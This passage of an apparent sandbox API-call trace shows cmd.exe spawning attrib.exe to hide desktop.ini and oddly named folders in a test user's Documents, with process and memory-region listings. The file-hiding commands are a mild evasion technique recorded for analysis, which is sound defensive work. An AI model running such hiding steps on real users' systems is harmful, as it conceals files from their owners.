lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.105] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.147] FindClose (in: hFindFile=0x3ae870 | out: hFindFile=0x3ae870) returned 1 [0233.147] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0233.147] _close (_FileHandle=3) returned 0 [0233.147] GetConsoleTitleW (in: lpConsoleTitle=0x1ef8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.148] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0233.148] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0233.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 
[0233.148] FindClose (in: hFindFile=0x3ae870 | out: hFindFile=0x3ae870) returned 1 [0233.148] FindClose (in: hFindFile=0x3ae870 | out: hFindFile=0x3ae870) returned 1 [0233.148] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0233.148] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0233.148] GetConsoleTitleW (in: lpConsoleTitle=0x1ef63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.148] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef4c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef58c | out: lpAttributeList=0x1ef4c4, lpSize=0x1ef58c) returned 1 [0233.148] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef4c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef584, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef4c4, lpPreviousValue=0x0) returned 1 [0233.148] GetStartupInfoW (in: lpStartupInfo=0x1ef480 | out: lpStartupInfo=0x1ef480*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0233.149] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0233.149] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef520*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef56c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" ", lpProcessInformation=0x1ef56c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd4, dwThreadId=0xd8)) returned 1 [0233.150] CloseHandle (hObject=0x50) returned 1 [0233.150] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0233.150] GetEnvironmentStringsW () returned 0x3b25e0* [0233.150] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0233.151] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0233.346] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1ef460 | out: lpExitCode=0x1ef460*=0x0) returned 1 [0233.346] CloseHandle (hObject=0x4c) returned 1 [0233.346] _vsnwprintf (in: _Buffer=0x1ef5a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef46c | out: _Buffer="00000000") returned 8 [0233.346] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.346] GetEnvironmentStringsW () returned 0x3b25e0* [0233.346] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0233.346] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.346] GetEnvironmentStringsW () returned 0x3b25e0* [0233.346] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0233.347] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef4c4 | out: lpAttributeList=0x1ef4c4) [0233.347] GetConsoleTitleW (in: lpConsoleTitle=0x1ef8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.347] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0233.347] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0233.347] 
GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0233.347] FindClose (in: hFindFile=0x3b3e00 | out: hFindFile=0x3b3e00) returned 1 [0233.347] FindClose (in: hFindFile=0x3b3e00 | out: hFindFile=0x3b3e00) returned 1 [0233.347] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0233.347] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0233.347] GetConsoleTitleW (in: lpConsoleTitle=0x1ef63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.348] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef4c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef58c | out: lpAttributeList=0x1ef4c4, lpSize=0x1ef58c) returned 1 [0233.348] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef4c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef584, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef4c4, lpPreviousValue=0x0) returned 1 [0233.348] GetStartupInfoW (in: lpStartupInfo=0x1ef480 | out: lpStartupInfo=0x1ef480*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0233.348] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0233.348] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef520*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef56c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"", lpProcessInformation=0x1ef56c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdc, dwThreadId=0xe0)) returned 1 [0233.349] CloseHandle (hObject=0x4c) returned 1 [0233.349] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0233.349] GetEnvironmentStringsW () returned 0x3b29d8* [0233.349] FreeEnvironmentStringsW (penv=0x3b29d8) returned 1 [0233.349] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0233.400] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef460 | out: lpExitCode=0x1ef460*=0x0) returned 1 [0233.400] CloseHandle (hObject=0x50) returned 1 [0233.400] _vsnwprintf (in: _Buffer=0x1ef5a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef46c | out: _Buffer="00000000") returned 8 [0233.401] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.401] GetEnvironmentStringsW () returned 0x3b29d8* [0233.401] FreeEnvironmentStringsW (penv=0x3b29d8) returned 1 [0233.401] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.401] GetEnvironmentStringsW () returned 0x3b29d8* [0233.401] FreeEnvironmentStringsW (penv=0x3b29d8) returned 1 [0233.401] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef4c4 | out: lpAttributeList=0x1ef4c4) [0233.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.401] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0233.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0233.401] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0233.401] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0233.401] SetConsoleInputExeNameW () returned 0x1 [0233.401] GetConsoleOutputCP () returned 0x1b5 [0233.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0233.401] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.402] exit (_Code=0) Process: id = "622" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16840" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "621" os_parent_pid = "0x9bc" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34856 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34857 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34858 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34859 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34860 start_va = 0x990000 end_va = 0x996fff entry_point = 0x990000 region_type = mapped_file name = 
"attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34861 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34862 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34863 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34864 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34865 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34866 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34867 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34868 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34869 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 34870 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 34871 start_va = 0x6f020000 end_va = 0x6f03cfff entry_point = 0x6f020000 region_type = mapped_file name = "ulib.dll" filename 
= "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34872 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34873 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34874 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34875 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34876 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34877 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34878 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34879 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34880 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 
region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34881 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34882 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34883 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 34884 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34885 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 862 os_tid = 0xd0 Process: id = "623" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "621" os_parent_pid = "0x9bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" 
[0x7] Region: id = 34886 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34887 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34888 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34889 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34890 start_va = 0x730000 end_va = 0x736fff entry_point = 0x730000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34891 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34892 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34893 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34894 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 34895 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34896 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34897 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34898 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34899 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 34900 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 34901 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34902 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34903 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34904 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34905 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34906 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34907 start_va = 0x76a90000 end_va 
= 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34908 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34909 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34910 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34911 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34912 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34913 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 34914 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34915 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 863 os_tid = 0xd8 Process: id = "624" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" 
os_pid = "0xdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "621" os_parent_pid = "0x9bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34916 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34917 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34918 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34919 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34920 start_va = 0x1f0000 end_va = 0x1f6fff entry_point = 0x1f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34921 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34922 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") 
Region: id = 34923 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34924 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 34925 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34928 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34929 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 34930 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34931 start_va 